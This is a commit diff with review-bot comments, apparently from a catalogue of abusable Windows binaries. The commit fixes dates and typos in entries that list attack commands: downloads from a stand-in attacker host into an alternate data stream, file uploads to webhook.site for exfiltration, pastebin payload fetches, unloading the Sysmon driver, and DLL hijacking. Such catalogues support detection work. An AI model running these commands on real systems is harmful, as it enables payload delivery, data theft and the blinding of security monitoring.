Applying minor format changes (incorrectly formatted dates, typos, etc.)

Wietze
2021-12-14 15:53:03 +00:00
22 changed files with 26 additions and 26 deletions


@@ -2,7 +2,7 @@
Name: AppInstaller.exe
Description: Tool used for installation of AppX/MSIX applications on Windows 10
Author: 'Wade Hickey'
Created: '2020-12-02'
Created: 2020-12-02
Commands:
- Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>
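Review bot: the unchanged Description line in this hunk has a subject mismatch ("it attempts to load/install a package from the URL and is saved in"); since the commit is already touching this file for formatting, split it into two sentences: "AppInstaller.exe is spawned by the default handler for the ms-appinstaller URI. It attempts to load/install a package from the URL; the downloaded package is saved in ...". The path could also use %LocalAppData% instead of C:\Users\%username%\AppData\Local, which is how the other entries in this commit (for example IMEWDBLD.exe) write it.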


@@ -6,7 +6,7 @@ Created: 2018-05-25
Commands:
- Command: ATBroker.exe /start malware
Description: Start a registered Assistive Technology (AT).
Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry.
Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistive Technology (AT) service entry.
Category: Execute
Privileges: User
MitreID: T1218
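Review bot: the typo fix is correct, but the Usecase it fixes says "Modifications must be made to the system registry to either register or modify an existing Assistive Technology (AT) service entry" while the trailing context two lines below still says "Privileges: User". Either the registration works from a per-user hive (in which case say so in the Usecase) or the entry needs a higher privilege level; as written the two lines contradict each other.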


@@ -2,7 +2,7 @@
Name: cmdl32.exe
Description: Microsoft Connection Manager Auto-Download
Author: 'Elliot Killick'
Created: '2021-08-26'
Created: 2021-08-26
Commands:
- Command: cmdl32 /vpn /lan %cd%\config
Description: Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where "X" denotes a random number or letter.
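Review bot: the Command line in this hunk uses `%cd%`, which is a cmd.exe dynamic variable and is not expanded by PowerShell; the Description should say the command is meant to be run from cmd.exe (or give an absolute path to the config file), otherwise someone pasting it into a PowerShell prompt will hand cmdl32 a literal `%cd%\config`.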


@@ -4,7 +4,7 @@ Description: Binary part of Windows Defender. Used to manage settings in Windows
Author: 'Ialle Teixeira'
Created: 2020-09-04
Commands:
- Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
- Command: ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
Description: Upload file, credentials or data exfiltration in general
Usecase: Upload file
Category: Upload
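Review bot: collapsing `\\` to `\` is the right fix here, since these values are plain YAML scalars where a backslash is not an escape character and the old text would have been rendered with doubled backslashes. While in the file, the unchanged Description "Upload file, credentials or data exfiltration in general" is not a sentence; something like "Uploads an arbitrary file to a remote URL; usable for credential or data exfiltration" matches the Usecase and Category lines below it.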


@@ -2,9 +2,9 @@
Name: DataSvcUtil.exe
Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.
Author: 'Ialle Teixeira'
Created: '01/12/2020'
Created: 2020-12-01
Commands:
- Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile
- Command: DataSvcUtil /out:C:\Windows\System32\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile
Description: Upload file, credentials or data exfiltration in general
Usecase: Upload file
Category: Upload
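Review bot: the Created change in this hunk resolves an ambiguous date. `'01/12/2020'` reads as 12 January 2020 under the US convention and 1 December 2020 under the day-first convention; the commit picks `2020-12-01`. Please confirm against the history of this file (or the original submission) before merging, because a wrong normalisation here looks correct and will never be revisited. The `\\` to `\` change on the DataSvcUtil command line is fine for the same reason as in ConfigSecurityPolicy.exe, and the Description shares that file's ungrammatical "Upload file, credentials or data exfiltration in general" wording.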


@@ -2,7 +2,7 @@
Name: Dllhost.exe
Description: Used by Windows to DLL Surrogate COM Objects
Author: 'Nasreddine Bencherchali'
Created: '2020-11-07'
Created: 2020-11-07
Commands:
- Command: dllhost.exe /Processid:{CLSID}
Description: Use dllhost.exe to load a registered or hijacked COM Server payload.
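Review bot: two small documentation points in the unchanged context of this hunk. "Used by Windows to DLL Surrogate COM Objects" uses "DLL Surrogate" as a verb; "Used by Windows as the DLL surrogate host for COM objects" reads correctly. And `{CLSID}` on the Command line is a placeholder, not a literal argument; the Description should say that it stands for the CLSID of a registered (or hijacked) COM server, as the Stordiag.exe and IMEWDBLD.exe entries do for their angle-bracket placeholders.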


@@ -2,7 +2,7 @@
Name: fltMC.exe
Description: Filter Manager Control Program used by Windows
Author: 'John Lambert'
Created: '2021-09-18'
Created: 2021-09-18
Commands:
- Command: fltMC.exe unload SysmonDrv
Description: Unloads a driver used by security agents
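Review bot: the Description "Unloads a driver used by security agents" is more general than the Command, which names `SysmonDrv` specifically. Say that SysmonDrv is the default name of the Sysmon minifilter, that the name is configurable at install time, and that `fltMC.exe filters` lists the loaded minifilters so the target can be identified; otherwise the entry reads as if the command works against any agent's driver.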


@@ -2,7 +2,7 @@
Name: IMEWDBLD.exe
Description: Microsoft IME Open Extended Dictionary Module
Author: 'Wade Hickey'
Created: '2020-03-05'
Created: 2020-03-05
Commands:
- Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw
Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
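Review bot: the paths in the unchanged Description mix separators, `INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>`, and the sentence is a run-on ("attempts to load a dictionary file, if provided a URL as an argument, it will download"). Since this commit is a formatting pass, use backslashes throughout and split the sentence: "IMEWDBLD.exe attempts to load a dictionary file. If given a URL as an argument, it downloads the file served at that URL and saves it to ...".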


@@ -18,7 +18,7 @@ Commands:
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\temp\nicefile.txt:evil.exe
Description: Download file to machine and store it in Alternate Data Stream
Usecase: Hide downloaded data inton an Alternate Data Stream
Category: ADS
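Review bot: a typo was missed in this hunk's trailing context: the Usecase line still reads "Hide downloaded data inton an Alternate Data Stream" ("inton" for "into"). Given the commit message says typos are in scope, fix it here rather than leaving it for another pass. The `\\` to `\` change on the `-path` argument is fine; note that the single `:` in `nicefile.txt:evil.exe` is the ADS separator and must stay.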


@@ -2,7 +2,7 @@
Name: OfflineScannerShell.exe
Description: Windows Defender Offline Shell
Author: 'Elliot Killick'
Created: '2021-08-16'
Created: 2021-08-16
Commands:
- Command: OfflineScannerShell
Description: Execute mpclient.dll library in the current working directory
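Review bot: the unchanged Description "Execute mpclient.dll library in the current working directory" does not say why that matters. The behaviour the Command relies on is that OfflineScannerShell resolves mpclient.dll from the current working directory ahead of the system copy, so an attacker-supplied mpclient.dll placed alongside it is loaded. Wording it as "Loads mpclient.dll from the current working directory (DLL search-order hijack)" makes the technique explicit; the same applies to the WorkFolders.exe entry in this commit.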


@@ -2,7 +2,7 @@
Name: OneDriveStandaloneUpdater.exe
Description: OneDrive Standalone Updater
Author: 'Elliot Killick'
Created: '2021-08-22'
Created: 2021-08-22
Commands:
- Command: OneDriveStandaloneUpdater
Description: Download a file from the web address specified in HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json
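Review bot: the unchanged Description in this hunk packs four registry prerequisites and an output path into one paragraph, which is hard to follow for anyone trying to reproduce or detect it. Suggest restructuring as: the key (`HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig`), the values that must be set (`UpdateRingSettingURLFromOC` with the download URL; `ODSUUpdateXMLUrlFromOC` and `UpdateXMLUrlFromOC` non-empty; `UpdateOfficeConfigTimestamp` a large QWORD such as 99999999999), and then the output location `%localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json`. Keeping those registry value names intact matters, since they are what a detection would key on.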


@@ -2,7 +2,7 @@
Name: PrintBrm.exe
Description: Printer Migration Command-Line Tool
Author: 'Elliot Killick'
Created: '2021-06-21'
Created: 2021-06-21
Commands:
- Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip
Description: Create a ZIP file from a folder in a remote drive
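Review bot: the `\\1.2.3.4\share\example_folder` on the Command line in this hunk is a UNC path, so the leading double backslash is intentional and must not be collapsed the way the `\\` sequences in ConfigSecurityPolicy.exe, DataSvcUtil.exe and MpCmdRun.exe were in this same commit. If the backslash normalisation was done with a search-and-replace, this file is the one to double-check; a short note in the Description that the source is a UNC share would stop the next formatting pass from "fixing" it.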


@@ -2,7 +2,7 @@
Name: SettingSyncHost.exe
Description: Host Process for Setting Synchronization
Author: 'Elliot Killick'
Created: '2021-08-26'
Created: 2021-08-26
Commands:
- Command: SettingSyncHost -LoadAndRunDiagScript anything
Description: Execute file specified in %COMSPEC%
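Review bot: the unchanged Description "Execute file specified in %COMSPEC%" does not say who controls that value. Read literally, it just describes launching cmd.exe. The entry should state that the attacker sets the COMSPEC environment variable to the path of an arbitrary executable before running `SettingSyncHost -LoadAndRunDiagScript anything`, and that the `anything` argument is a placeholder whose content is irrelevant.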


@@ -2,7 +2,7 @@
Name: Stordiag.exe
Description: Storage diagnostic tool
Author: 'Eral4m'
Created: '2021-10-21'
Created: 2021-10-21
Commands:
- Command: stordiag.exe
Description: Once executed, Stordiag.exe will execute schtasks.exe systeminfo.exe and fltmc.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it.
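Review bot: the unchanged Description in this hunk is missing list punctuation ("schtasks.exe systeminfo.exe and fltmc.exe") and runs two thoughts together with a dash. Suggest: "Once executed, stordiag.exe runs schtasks.exe, systeminfo.exe and fltmc.exe by name. If stordiag.exe is copied to a folder that contains an arbitrary executable renamed to one of these, that executable is run instead." This also makes clear that the point is binary search-order hijacking via the copied tool's directory.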


@@ -2,7 +2,7 @@
Name: WorkFolders.exe
Description: Work Folders
Author: 'Elliot Killick'
Created: '2021-08-16'
Created: 2021-08-16
Commands:
- Command: WorkFolders
Description: Execute control.exe in the current working directory
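Review bot: the unchanged Description "Execute control.exe in the current working directory" should say that WorkFolders.exe launches control.exe by name and therefore picks up an attacker-supplied control.exe placed in its current working directory; as phrased, it could be read as WorkFolders simply opening Control Panel. The same wording issue is present in the OfflineScannerShell.exe entry of this commit, where the hijacked file is mpclient.dll.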